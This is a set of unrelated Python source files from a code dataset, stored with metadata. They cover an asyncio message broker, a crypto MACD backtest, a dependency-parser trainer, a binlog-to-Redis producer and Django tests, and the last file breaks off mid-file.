asyncio.Queue(loop=asyncio.get_event_loop()), 'subs': []})\nQUEUES['q1']\nLWT = {}\nALIVE = {}\n\nMESSAGE_TYPES = collections.namedtuple(\n 'MessageTypes', ('command', 'error', 'response', 'lwt', 'check_alive', 'received')\n)(*('command', 'error', 'response', 'lwt', 'check_alive', 'received'))\nCOMMANDS = collections.namedtuple('Commands', ('send', 'subscribe', 'disconnect', 'keep_alive')\n)(*('send', 'subscribe', 'disconnect', 'keep_alive'))\n\n\ndef read_messages(files):\n for file in files:\n queue = file.split(\".\")[-2]\n QUEUES[queue]\n for line in open(file, \"r\"):\n jline = json.loads(line)\n QUEUES[queue]['obj'].put_nowait(jline)\n\n\n@asyncio.coroutine\ndef save_message(queue, message):\n file = queue + \".smq\"\n f = yield from aiofiles.open(file, mode='a+')\n try:\n yield from f.write(json.dumps(message) + \"\\n\")\n finally:\n yield from f.close()\n # print(\"Saved:\", str(message))\n\n\n@asyncio.coroutine\ndef delete_message(queue, message):\n file = queue + \".smq\"\n f = yield from aiofiles.open(file, \"r+\")\n d = yield from f.readlines()\n yield from f.seek(0)\n try:\n for i in d:\n if i != json.dumps(message) + \"\\n\":\n yield from f.write(i)\n finally:\n yield from f.truncate()\n yield from f.close()\n\n\ndef match_queues(queue):\n s = queue + \"$\"\n rex = s.replace(\"*\", \"(.*)\")\n queues_list = []\n for i in QUEUES:\n try:\n queues_list.append(re.match(rex, i).group(0))\n except Exception as e:\n LOGGER.error(\"match_queues error {}\".format(e))\n pass\n return queues_list\n\n\n@asyncio.coroutine\ndef send_all(writer, reader, queue, sub_id):\n first = 0\n while not QUEUES[queue][\"obj\"].empty():\n try:\n message = yield from QUEUES[queue][\"obj\"].get()\n reader.feed_data(\"feed\".encode('utf-8'))\n writer.write(json.dumps(message).encode('utf-8'))\n data = yield from reader.read(1024)\n # print(data)\n if data.decode('utf-8') == \"feed\" and first == 1:\n # this is a graceful disconnect\n writer.close()\n return\n first = 1\n if data.decode('utf-8') != \"feed\":\n yield from delete_message(queue, message)\n yield from writer.drain()\n yield from asyncio.sleep(0.1)\n except Exception as e:\n yield from QUEUES[queue][\"obj\"].put(message)\n LOGGER.error(\"send_all error {}\".format(e))\n lwt_message = {\n 'type': MESSAGE_TYPES.lwt,\n 'payload': LWT[sub_id][1]\n }\n lwt_queue = LWT[sub_id][0]\n yield from send_to_subscribers(lwt_queue, lwt_message)\n LOGGER.debug(\"Lwt sent - send_all: %s\", sub_id)\n writer.close()\n return\n QUEUES[queue]['subs'].append((writer, reader, sub_id))\n return \"Subscribed to {}\".format(queue)\n\n\n@asyncio.coroutine\ndef send_to_subscribers(queue, message):\n if QUEUES[queue]['subs']:\n for streams in QUEUES[queue]['subs']:\n writer = streams[0]\n sub_id = streams[2]\n try:\n writer.write(json.dumps(message).encode('utf-8'))\n yield from writer.drain()\n except Exception as e:\n if streams in QUEUES[queue]['subs']:\n QUEUES[queue]['subs'].remove(streams)\n writer.close()\n lwt_message = {\n 'type': MESSAGE_TYPES.lwt,\n 'payload': LWT[sub_id][1]\n }\n lwt_queue = LWT[sub_id][0]\n yield from send_to_subscribers(lwt_queue, lwt_message)\n LOGGER.debug(\"Lwt send_to_subs: %s\", sub_id)\n print(e)\n return\n if queue.endswith(\"_p\"):\n yield from delete_message(queue, message)\n return \"OK\"\n\n\n@asyncio.coroutine\ndef handle_command(message, writer, reader):\n command = message.get('command')\n queue = message.get('queue')\n # LOGGER.debug('Handling command %s, payload %s', command, payload)\n if command not in COMMANDS:\n LOGGER.error('Got invalid command %s', command)\n raise ValueError('Invalid command. Should be one of %s' % (COMMANDS,))\n\n if command == COMMANDS.send:\n persistent = queue.endswith(\"_p\")\n if persistent:\n yield from save_message(queue, message)\n msg = yield from send_to_subscribers(queue, message)\n\n elif command == COMMANDS.subscribe:\n queues_to_subscribe = match_queues(queue)\n sub_id = message.get('sub_id')\n lwt_queue = message.get('lwt_queue')\n lwt_message = message.get('lwt_message')\n LWT[sub_id] = [lwt_queue, lwt_message]\n if not queues_to_subscribe:\n return {\n 'type': MESSAGE_TYPES.error,\n 'payload': \"No such queue!\"\n }\n for q in queues_to_subscribe:\n if q.endswith(\"_p\"):\n msg = yield from send_all(writer, reader, q, sub_id)\n else:\n QUEUES[q]['subs'].append((writer, reader, sub_id))\n msg = \"Subscribed to {}\".format(q)\n\n elif command == COMMANDS.disconnect:\n sub_id = message.get('sub_id')\n LOGGER.debug(\"Disconnected: %s\", sub_id)\n for q in QUEUES:\n for sub in QUEUES[q]['subs']:\n if sub[2] == sub_id:\n QUEUES[q]['subs'].remove(sub)\n del ALIVE[sub_id]\n del LWT[sub_id]\n msg = \"Disconnect OK\"\n\n elif command == COMMANDS.keep_alive:\n sub_id = message.get('sub_id')\n LOGGER.debug(\"Keep Alive from: %s\", sub_id)\n ALIVE[sub_id] = time.time()\n msg = \"Alive OK\"\n\n return {\n 'type': MESSAGE_TYPES.response,\n 'payload': msg\n }\n\n\n@asyncio.coroutine\ndef dispatch_message(message, writer, reader):\n message_type = message.get('type')\n if message_type != MESSAGE_TYPES.command:\n LOGGER.error('Got invalid message type %s', message_type)\n raise ValueError('Invalid message type. Should be %s' % (MESSAGE_TYPES.command,))\n # LOGGER.debug('Dispatching command %s', command)\n response = yield from handle_command(message, writer, reader)\n return response\n","sub_path":"src/notibroker/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":6633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"616138880","text":"import pandas as pd\r\nfrom ta.trend import macd, macd_signal, macd_diff\r\nfrom ta.momentum import rsi\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport cbpro\r\nimport datetime\r\nimport sys\r\n\r\npublic_client = cbpro.PublicClient()\r\n\r\ntrade_amount = 100\r\ncoins = [\"BTC-USD\", \"ETH-USD\", \"ADA-USD\", \"UNI-USD\", \"BCH-USD\", \"LTC-USD\", \"LINK-USD\", \"XLM-USD\", \"MATIC-USD\", \"ETC-USD\", \"EOS-USD\", \"AAVE-USD\", \"FIL-USD\", \"MKR-USD\", \"XTZ-USD\", \"ATOM-USD\", \"ALGO-USD\", \"COMP-USD\", \"DASH-USD\", \"ZEC-USD\", \"SNX-USD\", \"SUSHI-USD\", \"YFI-USD\", \"MANA-USD\", \"BAT-USD\", \"ENJ-USD\"]\r\ncoins = [\"FIL-USD\"]\r\n\r\ncurrent_status = pd.DataFrame()\r\n\r\nfor coin in coins:\r\n three_hundred_days_ago = (datetime.datetime.today().date() - datetime.timedelta(days=300)).strftime(\"%Y-%m-%d\")\r\n six_hundred_days_ago = (datetime.datetime.today().date() - datetime.timedelta(days=600)).strftime(\"%Y-%m-%d\")\r\n data = public_client.get_product_historic_rates(coin, granularity=86400)\r\n data2 =public_client.get_product_historic_rates(coin, six_hundred_days_ago, three_hundred_days_ago, granularity=86400)\r\n data = pd.DataFrame(data, columns=[\"time\", \"low\", \"high\", \"open\", \"close\", \"volume\"])\r\n data2 = pd.DataFrame(data2, columns=[\"time\", \"low\", \"high\", \"open\", \"close\", \"volume\"])\r\n data = data.append(data2)\r\n data[\"date\"] = pd.to_datetime(data[\"time\"], unit=\"s\")\r\n\r\n # plt.figure(figsize=(16,6))\r\n # plt.plot(data[\"date\"][:30], data[\"close\"][:30])\r\n\r\n df = data[[\"date\", \"close\"]][::-1]\r\n df[\"macd\"] = macd(df[\"close\"])\r\n df[\"macd_signal\"] = macd_signal(df[\"close\"])\r\n df[\"macd_diff\"] = macd_diff(df[\"close\"])\r\n df[\"rsi\"] = rsi(df[\"close\"])\r\n # plt.figure(figsize=(16, 6))\r\n # plt.plot(df[\"date\"][-50:], df[\"macd\"][-50:])\r\n # plt.plot(df[\"date\"][-50:], df[\"macd_signal\"][-50:])\r\n\r\n # plt.figure(figsize=(16,6))\r\n # plt.bar(df[\"date\"][-50:], df[\"macd_diff\"][-50:])\r\n\r\n # plt.figure(figsize=(16,6))\r\n # plt.plot(df[\"date\"], df[\"rsi\"])\r\n\r\n df2 = df.copy()\r\n df2 = df2.set_index(\"date\")\r\n df2 = df2[[\"macd_diff\"]]\r\n df2 = df2.shift(periods=1)\r\n main = df.merge(df2, on=\"date\")\r\n conditions = [\r\n ((main[\"macd_diff_x\"] < 0) & (main[\"macd_diff_x\"] > main[\"macd_diff_y\"])),\r\n ((main[\"macd_diff_x\"] > 0) & (main[\"macd_diff_x\"] < main[\"macd_diff_y\"])),\r\n ((main[\"macd_diff_x\"] > 0) & (main[\"macd_diff_y\"] < 0)) | ((main[\"macd_diff_x\"] < 0) & (main[\"macd_diff_y\"] > 0))\r\n ]\r\n choices = [\"BCONV\", \"SCONV\", \"CROSS\"]\r\n main[\"today\"] = np.select(conditions, choices, default=\"DIV\")\r\n df4 = df.copy()\r\n df4 = df4.set_index(\"date\")\r\n df4 = df4[[\"macd_diff\"]]\r\n df4 = df4.rename(columns={\"macd_diff\": \"macd_diff_z\"})\r\n df4 = df4.shift(periods=2)\r\n main = main.merge(df4, on=\"date\")\r\n conditions = [\r\n ((main[\"macd_diff_y\"] < 0) & (main[\"macd_diff_y\"] > main[\"macd_diff_z\"])),\r\n ((main[\"macd_diff_y\"] > 0) & (main[\"macd_diff_y\"] < main[\"macd_diff_z\"])),\r\n ((main[\"macd_diff_y\"] > 0) & (main[\"macd_diff_z\"] < 0)) | ((main[\"macd_diff_y\"] < 0) & (main[\"macd_diff_z\"] > 0))\r\n ]\r\n choices = [\"BCONV\", \"SCONV\", \"CROSS\"]\r\n main[\"yest\"] = np.select(conditions, choices, default=\"DIV\")\r\n df5 = df.copy()\r\n df5 = df5.set_index(\"date\")\r\n df5 = df5[[\"macd_diff\"]]\r\n df5 = df5.rename(columns={\"macd_diff\": \"macd_diff_a\"})\r\n df5 = df5.shift(periods=3)\r\n main = main.merge(df5, on=\"date\")\r\n conditions = [\r\n ((main[\"macd_diff_z\"] < 0) & (main[\"macd_diff_z\"] > main[\"macd_diff_a\"])),\r\n ((main[\"macd_diff_z\"] > 0) & (main[\"macd_diff_z\"] < main[\"macd_diff_a\"])),\r\n ((main[\"macd_diff_z\"] > 0) & (main[\"macd_diff_a\"] < 0)) | ((main[\"macd_diff_z\"] < 0) & (main[\"macd_diff_a\"] > 0))\r\n ]\r\n choices = [\"BCONV\", \"SCONV\", \"CROSS\"]\r\n main[\"two_d_ago\"] = np.select(conditions, choices, default=\"DIV\")\r\n df6 = df.copy()\r\n df6 = df6.set_index(\"date\")\r\n df6 = df6[[\"macd_diff\"]]\r\n df6 = df6.rename(columns={\"macd_diff\": \"macd_diff_b\"})\r\n df6 = df6.shift(periods=4)\r\n main = main.merge(df6, on=\"date\")\r\n conditions = [\r\n ((main[\"macd_diff_a\"] < 0) & (main[\"macd_diff_a\"] > main[\"macd_diff_b\"])),\r\n ((main[\"macd_diff_a\"] > 0) & (main[\"macd_diff_a\"] < main[\"macd_diff_b\"])),\r\n ((main[\"macd_diff_a\"] > 0) & (main[\"macd_diff_b\"] < 0)) | ((main[\"macd_diff_a\"] < 0) & (main[\"macd_diff_b\"] > 0))\r\n ]\r\n choices = [\"BCONV\", \"SCONV\", \"CROSS\"]\r\n main[\"three_d_ago\"] = np.select(conditions, choices, default=\"DIV\")\r\n main = main[[\"date\", \"close\", \"macd\", \"macd_signal\", \"macd_diff_x\", \"rsi\", \"today\", \"yest\", \"two_d_ago\", \"three_d_ago\"]]\r\n main = main.rename(columns={\"macd_diff_x\": \"macd_diff\"})\r\n future_price = df.copy()\r\n future_price = future_price.set_index(\"date\")\r\n future_price = future_price.shift(periods=-7)\r\n future_price = future_price[[\"close\"]]\r\n main = main.merge(future_price, on=\"date\")\r\n main = main.rename(columns={\"close_x\": \"close\", \"close_y\": \"future_price\"})\r\n conditions = [\r\n ((main[\"today\"]==\"BCONV\")|(main[\"today\"]==\"CROSS\"))&(main[\"yest\"]==\"BCONV\"),\r\n (main[\"today\"]==\"CROSS\")&(main[\"yest\"]==\"SCONV\")\r\n ]\r\n main[\"action\"] = np.select(conditions, [\"BUY\", \"SELL\"], \"\")\r\n remove_conseq = main.copy().set_index(\"date\").shift(periods=1)[[\"action\"]]\r\n main = main.merge(remove_conseq, on=\"date\")\r\n main[\"action\"] = np.where(main[\"action_x\"]==main[\"action_y\"],\"\",main[\"action_x\"])\r\n main = main[[\"date\", \"close\", \"macd\", \"macd_signal\", \"macd_diff\", \"rsi\", \"today\", \"yest\", \"two_d_ago\", \"three_d_ago\", \"action\"]]\r\n main.to_csv(\"main.csv\")\r\n\r\n main_action_days = main.loc[main[\"action\"].isin([\"BUY\", \"SELL\"])]\r\n remove_conseq = main_action_days.copy().set_index(\"date\").shift(periods=1)[[\"action\"]]\r\n main_action_days = main_action_days.merge(remove_conseq, on=\"date\")\r\n main_action_days[\"action\"] = np.where(main_action_days[\"action_x\"]==main_action_days[\"action_y\"],\"\",main_action_days[\"action_x\"])\r\n main_action_days = main_action_days.loc[main_action_days[\"action\"].isin([\"BUY\", \"SELL\"])]\r\n main_action_days[\"coin\"] = coin\r\n main_action_days = main_action_days.drop([\"action_x\", \"action_y\"], axis=1)\r\n try:\r\n if main_action_days.iloc[0][\"action\"] == \"SELL\":\r\n main_action_days = main_action_days[1:]\r\n except:\r\n pass\r\n # print(main_action_days)\r\n buys = main_action_days.loc[main_action_days[\"action\"]==\"BUY\"].reset_index()\r\n sells = main_action_days.loc[main_action_days[\"action\"]==\"SELL\"].reset_index()\r\n # print(buys)\r\n # print(sells)\r\n output = buys.merge(sells, left_index=True, right_index=True)\r\n output = output[[\"coin_x\", \"date_x\", \"close_x\", \"date_y\", \"close_y\"]].rename(columns={\"coin_x\": \"coin\", \"date_x\": \"buy_date\", \"close_x\": \"buy_price\", \"date_y\": \"sell_date\", \"close_y\": \"sell_price\"})\r\n output[\"profit\"] = (trade_amount/output[\"buy_price\"])*(output[\"sell_price\"]-output[\"buy_price\"])\r\n output.to_csv(\"output.csv\")\r\n # print(output)\r\n print(coin + \" PROFIT: \" + str(output[\"profit\"].sum()))\r\n main[\"coin\"] = coin\r\n current_status = current_status.append(main[-1:])\r\ncurrent_status.to_csv(\"current_status.csv\")","sub_path":"coin.py","file_name":"coin.py","file_ext":"py","file_size_in_byte":7173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"432841074","text":"def countNumOfUnique(int_list):\n \"\"\"Count number of diff int\n \n Arguments:\n int_list {[list of int]} -- [only odd or even ints]\n \n Returns:\n [int] -- [number of diff int]\n \"\"\"\n num_of_uniq = 0\n list_of_uniq = []\n for i in int_list:\n if (i not in list_of_uniq):\n list_of_uniq.append(i)\n num_of_uniq = num_of_uniq + 1\n \n return num_of_uniq","sub_path":"exercise/countNumOfUnique.py","file_name":"countNumOfUnique.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"426157678","text":"import operator\n\nclass Ant:\n\tdef __init__(self, p, r):\n\t\tself.t = 0\t\t # The local time for the ant\n\t\tself.p = p \t\t # The position of the ant\n\t\tself.op = p \t # The original position\n\t\tself.r = r \t\t # True if the ant is headed right\n\t\tself.alive = True # If the ant has fallen off or not\n\n\tdef age(self, t):\n\t\t\"\"\"\n\t\tWalk and age the ant t time units. Assumes no obstacles.\n\t\t\"\"\"\n\t\tself.t += t\n\t\tif self.r:\n\t\t\tself.p += t\n\t\telse:\n\t\t\tself.p -= t\n\n\tdef die(self):\n\t\t\"\"\"\n\t\tMarks the ant as fallen off the edge (or dead)\n\t\t\"\"\"\n\t\tself.alive = False\n\n\tdef turn(self):\n\t\tself.r = not self.r\n\n\tdef __str__(self):\n\t\treturn 'Ant(' + str(self.op) + \" - \" + str(self.p) + \" @ \" + str(self.t) + \", \" + ('R' if self.r else 'L') + ')'\n\ndef get_ants():\n\t\"\"\"\n\tReads the ants from stdin\n\t\"\"\"\n\ttry:\n\t\tline = input().split(' ')\n\t\tL, A = int(line[0]), int(line[1])\n\t\tants = []\n\t\tfor _ in range(A):\n\t\t\tline = input().split(' ')\n\t\t\tp, r = int(line[0]), line[1] == 'R'\n\t\t\tants.append( Ant(p, r) )\n\t\t# Make sure the ants are in order\n\t\tants.sort(key=operator.attrgetter('p'))\n\t\treturn L, ants\n\texcept EOFError:\n\t\tpass\n\treturn None, None\n\ndef printt(ants):\n\t\"\"\"\n\tPrints the ants array\n\t\"\"\"\n\tants = [str(a) for a in ants]\n\tprint(ants)\n\ndef is_path_clear(ants, i):\n\t\"\"\"\n\tDetermines if the path to the edge is clear or if you have to bump\n\tanother ant first.\n\t\"\"\"\n\tif ants[i].r:\n\t\treturn all(ants[k].r for k in range(i, len(ants)))\n\treturn all(not ants[k].r for k in range(i))\n\ndef distance_to_edge(L, ants, i):\n\t\"\"\"\n\tReturns the distance the i:th ant has left to the edge.\n\t\"\"\"\n\tif ants[i].r:\n\t\treturn L - ants[i].p\n\treturn ants[i].p\n\ndef get_neighbour(ants, i):\n\t\"\"\"\n\tReturns the neighbour the ant is looking at.\n\t\"\"\"\n\tif ants[i].r:\n\t\treturn i + 1\n\treturn i - 1\n\ndef bump(ants, i, k):\n\t\"\"\"\n\tBumps the two ants. Assumes they are at the same place in time.\n\t\"\"\"\n\t# Ants will meet at the very middle between them.\n\td = abs(ants[i].p - ants[k].p) / 2\n\t# Walk, or age, the ants\n\tants[i].age(d)\n\tants[k].age(d)\n\t# Since they bumped into eachother, turn them around\n\tants[i].turn()\n\tants[k].turn()\n\ndef sync(ants, i, k):\n\t\"\"\"\n\tAssumes the ants are moving towards eachother.\n\t\"\"\"\n\tdiff = ants[i].t - ants[k].t\n\tif diff >= 0:\n\t\t# The i:th ant has been alive longer, move other ant\n\t\tants[k].age(diff)\n\telse:\n\t\tants[i].age(-diff)\n\ndef walk(L, ants, i):\n\t\"\"\"\n\tWalks the i:th ant to the edge.\n\t\"\"\"\n\twhile ants[i].alive:\n\t\tclear_path = is_path_clear(ants, i)\n\t\tif clear_path:\n\t\t\td = distance_to_edge(L, ants, i)\n\t\t\tants[i].age(d)\n\t\t\tants[i].die()\n\t\t\treturn\n\t\t# We have to bump another ant first\n\t\tneighbour = get_neighbour(ants, i)\n\t\tif ants[neighbour].r == ants[i].r:\n\t\t\t# We are moving in the same direction and we have to turn the neighbour\n\t\t\t# around first.\n\t\t\twalk(L, ants, neighbour)\n\t\telse:\n\t\t\t# The ants are moving towards eachother, make sure they are\n\t\t\t# in the same timespan\n\t\t\tsync(ants, i, neighbour)\n\t\t\t# Bump the ants\n\t\t\tbump(ants, i, neighbour)\n\ndef get_last_ant(L, ants):\n\tfor i in range(len(ants)):\n\t\twalk(L, ants, i)\n\tfor i in reversed(range(len(ants))):\n\t\twalk(L, ants, i)\n\ndef get_oldest(ants):\n\t\"\"\"\n\tReturns the oldest ants\n\t\"\"\"\n\toldest = []\n\tfor a in ants:\n\t\tif oldest == [] or oldest[0].t <= a.t:\n\t\t\tif len(oldest) > 0 and oldest[0].t < a.t:\n\t\t\t\toldest = []\n\t\t\toldest.append(a)\n\toldest.sort(key=operator.attrgetter('op'))\n\treturn oldest\n\nwhile True:\n\tL, ants = get_ants()\n\tif L is None or ants is None:\n\t\tbreak\n\n\tget_last_ant(L, ants)\n\toldest = get_oldest(ants)\n\n\tt = oldest[0].t\n\tif (t * 1.0).is_integer():\n\t\tt = int(t)\n\top = ' and '.join([ str(a.op) for a in oldest ])\n\n\tprint(\"The last ant will fall down in \" + str(t) + \" seconds - started at \" + op + \".\")\n","sub_path":"andrewant/andrewant.py","file_name":"andrewant.py","file_ext":"py","file_size_in_byte":3648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"287501217","text":"import torch\nimport torch.nn as nn\nfrom torch.utils.data import Dataset, DataLoader\nimport torch.optim as optim\nfrom torch.optim import lr_scheduler\nfrom depparse.trans_based.parser_utils import load_and_preprocess_data\nfrom depparse.trans_based.parse import PartialParse\nfrom depparse.diagnosis import check_fault\nimport argparse\n\n\nclass HyperParam:\n lr = 1e-2\n momentum = 0.9\n batch_size = 32\n num_epoch = 200\n hidden_size = 200\n weight_decay = 10e-8\n gpu_id = 0\n\n\nclass TreeBank(Dataset):\n def __init__(self, example):\n self.ex = example\n self.num_ft = len(example[0][0])\n self.num_label = len(example[0][1])\n\n def __len__(self):\n return len(self.ex)\n\n def __getitem__(self, item):\n features, legal_labels, gt = self.ex[item]\n features = torch.LongTensor(features)\n legal_labels = torch.DoubleTensor(legal_labels)\n gt = int(gt)\n return {'feature': features, 'legal_label': legal_labels, 'gt': gt}\n\n\nclass NaiveParser(nn.Module):\n def __init__(self, embed_mat, num_ft, num_label, hidden_size=800):\n super(NaiveParser, self).__init__()\n self.embed = nn.Embedding.from_pretrained(embeddings=torch.from_numpy(embed_mat), freeze=False)\n self.len_embed_ft = num_ft * embed_mat.shape[1]\n self.fc1 = nn.Linear(self.len_embed_ft + num_label, hidden_size)\n self.fc2 = nn.Linear(hidden_size, num_label)\n\n def forward(self, feature, legal_label):\n embed_ft = self.embed(feature)\n embed_ft = embed_ft.view(-1, self.len_embed_ft)\n if embed_ft.dtype != legal_label.dtype:\n legal_label = legal_label.type_as(embed_ft)\n in_ft = torch.cat([embed_ft, legal_label], dim=-1)\n hidden = self.fc1(in_ft)\n # hidden = torch.tanh(hidden)\n hidden = hidden ** 3 # cube activation in {Chen & Manning, 2014}\n return self.fc2(hidden)\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('f', type=str, help='The folder datasets are located.')\n parser.add_argument('--model-path', type=str, help='Where to save and load the model.')\n parser.add_argument('--lr', type=float, help='The learning rate.')\n parser.add_argument('--momentum', type=float, help='The momentum value.')\n parser.add_argument('--batch-size', type=int, help='The size of each batch.')\n parser.add_argument('--num-epoch', type=int, help='The number of epochs.')\n parser.add_argument('--hidden-size', type=int, help='The size of the hidden layer.')\n parser.add_argument('--weight-decay', type=float, help='The L2 regularization term.')\n parser.add_argument('--diagnosis-file', type=str, help='The file to output fault examples.')\n args = parser.parse_args()\n return args\n\n\ndef train_model(train_data, model, criterion, optimizer, device,\n scheduler=None, dev_data=None, batch_size=32, num_epoch=100):\n train_loader = DataLoader(train_data, batch_size=batch_size, shuffle=True, num_workers=4)\n if dev_data is not None:\n eval_data, parser = dev_data\n\n for epoch in range(num_epoch):\n model.train()\n if scheduler is not None:\n scheduler.step()\n epoch_loss = 0.0\n\n for sample in train_loader:\n feature, legal_label, gt = sample['feature'], sample['legal_label'], sample['gt']\n feature, legal_label, gt = feature.to(device), legal_label.to(device), gt.to(device)\n out = model(feature, legal_label)\n\n optimizer.zero_grad()\n loss = criterion(out, gt)\n loss.backward()\n optimizer.step()\n\n epoch_loss += loss.item()\n\n print('Training epoch {:03d}, loss is {:.4f}'.format(epoch, epoch_loss))\n if dev_data is not None:\n print('Evaluating on the development set...')\n prediction(model, eval_data, parser, device)\n print('\\n' + '=' * 40 + '\\n')\n return model\n\n\ndef prediction(model, data, parser, device):\n model.eval()\n with torch.set_grad_enabled(False):\n num_suc = 0\n num_correct = 0\n num_correct_label = 0\n num_total = 0\n\n for id, example in enumerate(data):\n ex = PartialParse(example)\n ex.safe_parse(model, parser, device)\n if not ex.success:\n continue\n num_suc += 1\n correct, n_words = ex.accuracy()\n num_correct += correct\n num_total += n_words\n if not parser.unlabeled:\n correct_label, _ = ex.accuracy(unlabeled=False)\n num_correct_label += correct_label\n\n print('Totally {:d} sentences, {:d} succeeded!'.format(len(data), num_suc))\n print('UAS: {:d} / {:d} = {:.4f}'.format(num_correct, num_total, num_correct / num_total))\n if not parser.unlabeled:\n print('LAS: {:d} / {:d} = {:.4f}'.format(num_correct_label, num_total, num_correct_label / num_total))\n\n\ndef main():\n args = parse_args()\n\n parser, embeddings_matrix, train_examples, dev_set, test_set = load_and_preprocess_data(\n reduced=False, data_path=args.f)\n train_data = TreeBank(train_examples)\n\n default = HyperParam()\n if args.lr is not None:\n default.lr = args.lr\n if args.momentum is not None:\n default.momentum = args.momentum\n if args.batch_size is not None:\n default.batch_size = args.batch_size\n if args.num_epoch is not None:\n default.num_epoch = args.num_epoch\n if args.hidden_size is not None:\n default.hidden_size = args.hidden_size\n if args.weight_decay is not None:\n default.weight_decay = args.weight_decay\n\n model = NaiveParser(embeddings_matrix, train_data.num_ft, train_data.num_label, hidden_size=default.hidden_size)\n\n # debug the model instead of training\n if args.diagnosis_file is not None:\n model.load_state_dict(torch.load(args.model_path))\n check_fault.diagnosing(model, test_set, parser, args.diagnosis_file)\n return\n\n # train the model and save it\n criterion = nn.CrossEntropyLoss()\n # optimizer = optim.SGD(params=model.parameters(), lr=default.lr, momentum=default.momentum)\n # exp_lr_scheduler = lr_scheduler.StepLR(optimizer=optimizer, step_size=default.num_epoch // 3, gamma=0.1)\n device = torch.device('cuda:{:d}'.format(default.gpu_id)\n if default.gpu_id >= 0 and torch.cuda.is_available() else 'cpu')\n model = model.to(device)\n optimizer = optim.Adagrad(params=model.parameters(), lr=default.lr, weight_decay=default.weight_decay)\n\n model = train_model(train_data, model, criterion, optimizer, device,\n dev_data=(dev_set, parser), batch_size=default.batch_size, num_epoch=default.num_epoch)\n model = model.to('cpu')\n\n if args.model_path is not None:\n torch.save(model.state_dict(), args.model_path)\n\n prediction(model, test_set, parser, 'cpu')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"depparse/trans_based/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"261187804","text":"import json\n\nimport aioredis\nfrom asyncmy import connect\nfrom asyncmy.replication.binlogstream import BinLogStream\nfrom asyncmy.replication.row_events import DeleteRowsEvent, UpdateRowsEvent, WriteRowsEvent\nfrom dynaconf import Dynaconf\nfrom loguru import logger\n\nfrom fettler import constants\nfrom fettler.utils import JsonEncoder\n\n\nasync def run(settings: Dynaconf):\n mysql = settings.mysql\n redis = settings.redis\n max_len = redis.max_len or constants.STREAM_MAX_LEN\n redis = await aioredis.create_redis_pool(\n f\"redis://{redis.host}:{redis.port}\", db=redis.db, encoding=\"utf8\"\n )\n connect_kwargs = dict(\n host=mysql.host, port=mysql.port, user=mysql.user, password=mysql.password\n )\n conn = await connect(**connect_kwargs)\n ctl_conn = await connect(**connect_kwargs)\n stream = BinLogStream(\n connection=conn,\n ctl_connection=ctl_conn,\n resume_stream=True,\n blocking=True,\n only_events=[WriteRowsEvent, UpdateRowsEvent, DeleteRowsEvent],\n **settings.replication,\n )\n await stream.connect()\n logger.info(\n f\"Start producer success, listening on binlog from schemas {settings.replication.only_schemas}....\"\n )\n async for event in stream:\n if isinstance(event, DeleteRowsEvent):\n type_ = \"delete\"\n elif isinstance(event, WriteRowsEvent):\n type_ = \"create\"\n else:\n type_ = \"update\"\n msg = {\"schema\": event.schema, \"table\": event.table, \"rows\": event.rows, \"type\": type_}\n msg = json.dumps(msg, cls=JsonEncoder)\n await redis.xadd(constants.STREAM, {\"msg\": msg}, max_len=max_len)\n","sub_path":"fettler/producer.py","file_name":"producer.py","file_ext":"py","file_size_in_byte":1660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"429624209","text":"from unittest.mock import MagicMock\nfrom uuid import uuid4\n\nfrom django.test import SimpleTestCase, TestCase\n\nfrom casexml.apps.case.mock import CaseFactory, CaseIndex, CaseStructure\n\nfrom corehq.apps.domain.shortcuts import create_domain\nfrom corehq.form_processor.interfaces.dbaccessors import CaseAccessors\nfrom corehq.form_processor.models import Attachment\n\nDOMAIN = 'test-domain'\n\n\nclass AttachmentHasSizeTests(SimpleTestCase):\n def test_handles_no_size_property(self):\n raw_content = MagicMock(spec_set=[''])\n attachment = self.create_attachment_with_content(raw_content)\n self.assertFalse(attachment.has_size())\n\n def test_handles_None(self):\n raw_content = MagicMock(size=None, spec_set=['size'])\n attachment = self.create_attachment_with_content(raw_content)\n self.assertFalse(attachment.has_size())\n\n def test_handles_valid_size(self):\n raw_content = MagicMock(size=1024, spec_set=['size'])\n attachment = self.create_attachment_with_content(raw_content)\n self.assertTrue(attachment.has_size())\n\n @staticmethod\n def create_attachment_with_content(content):\n return Attachment(name='test_attachment', raw_content=content, content_type='text')\n\n\nclass TestIndices(TestCase):\n \"\"\"\n Verify that when two indices are created with the same identifier,\n CommCareCaseSQL.indices returns only the last one created.\n \"\"\"\n\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n cls.domain_obj = create_domain(DOMAIN)\n cls.factory = CaseFactory(domain=DOMAIN)\n\n @classmethod\n def tearDownClass(cls):\n cls.domain_obj.delete()\n super().tearDownClass()\n\n def setUp(self):\n johnny_id = str(uuid4())\n nathaniel_id = str(uuid4())\n elizabeth_id = str(uuid4())\n (self.johnny_case,\n self.nathaniel_case,\n self.elizabeth_case) = self.factory.create_or_update_case(\n CaseStructure(\n case_id=johnny_id,\n attrs={\n 'create': True,\n 'case_type': 'child',\n 'case_name': 'Johnny APPLESEED',\n 'owner_id': 'b0b',\n 'external_id': 'johnny12345',\n 'update': {\n 'first_name': 'Johnny',\n 'last_name': 'Appleseed',\n 'date_of_birth': '2021-08-27',\n 'dhis2_org_unit_id': 'abcdef12345',\n },\n },\n indices=[\n CaseIndex(\n CaseStructure(\n case_id=nathaniel_id,\n attrs={\n 'create': True,\n 'case_type': 'parent',\n 'case_name': 'Nathaniel CHAPMAN',\n 'owner_id': 'b0b',\n 'external_id': 'nathaniel12',\n 'update': {\n 'first_name': 'Nathaniel',\n 'last_name': 'Chapman',\n 'dhis2_org_unit_id': 'abcdef12345',\n },\n },\n 